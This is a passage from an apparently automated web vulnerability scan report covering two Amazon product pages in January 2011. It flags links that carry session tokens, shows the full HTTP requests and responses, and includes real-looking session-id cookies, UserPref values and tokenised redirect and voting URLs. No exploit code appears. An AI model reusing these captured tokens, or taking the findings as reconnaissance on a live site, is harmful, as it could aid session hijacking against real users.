</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_0981511821/177-1907126-9874658?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.17. http://www.amazon.com/gp/product/184968006X

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/184968006X

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:20 GMT
Server: Server
x-amz-id-1: 0XKECKNR6H60A6C1P2PC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
Content-Length: 400270


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_nmkrnb0KCN66A?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_fa_dp_nmkrnb0KCN66A%26bodytext%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_nmkrnb0KCN66A?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_fa_dp_nmkrnb0KCN66A%26bodytext%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_nmkrnb0KCN66A?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F184968006X%252Fref%253Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_nmkrnb0KCN66A?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F184968006X%252Fref%253Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C528D74CE108B51ADF700EDE9B58756F117A6778&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=39C1FB4A30BAA4BF73279374D7DC87858E61D96F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4DD433FE7637EE1BE3766B94B047C4A371A9C8B8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=41F556ECB290E80B254EB00D3A227CA897ECD8B0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=D8A2919B13050E502CCFB68A2497B7FBE4582C58&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=455A7397FFB26B5989764534CDD846328D74CD06&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=76717228FE30975E8AF64100357ADF4AF0BC2AF1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34E5070F33D26B6EC34A2C2DCF086842CE9AC262&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0C8FAE0A58222B2EF35D388EC6197256843C46BE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866"
>
Report abuse</a>
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_184968006X/180-2237308-2659866?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.18. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:13 GMT
Server: Server
x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
Content-Length: 398788


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_klkrnb0REJWNJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_fa_idp_klkrnb0REJWNJ%26bodytext%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_klkrnb0REJWNJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_fa_idp_klkrnb0REJWNJ%26bodytext%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_klkrnb0REJWNJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F1935182374%252Fref%253Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_klkrnb0REJWNJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F1935182374%252Fref%253Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<td style="font-size: 11px;"><a href="/gp/redirect.html/ref=amb_link_354882122_1/187-0383633-5130955?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>

FREE Two-Day Shipping for Students. <a href="/gp/redirect.html/ref=amb_link_354882122_3/187-0383633-5130955?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374">Learn more</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=CE0FE3633AB768F36A17D6FA5EB1E81A1038E5E7&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=635F1EAA6A01F39057804214363DC0EC76CA967E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=30C41A68C0D0C2CDCE56654AE3155FBD450AE952&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=87EE02430F44D607DF72D1FE05ED8693FC4DC839&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8C320C019E16DC7A431A57CAC44E919BBB761E45&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=84BC4F29EDB193C5AAFBBA4654395CD6249CD7F5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955"
>
Report abuse</a>
...[SNIP]...
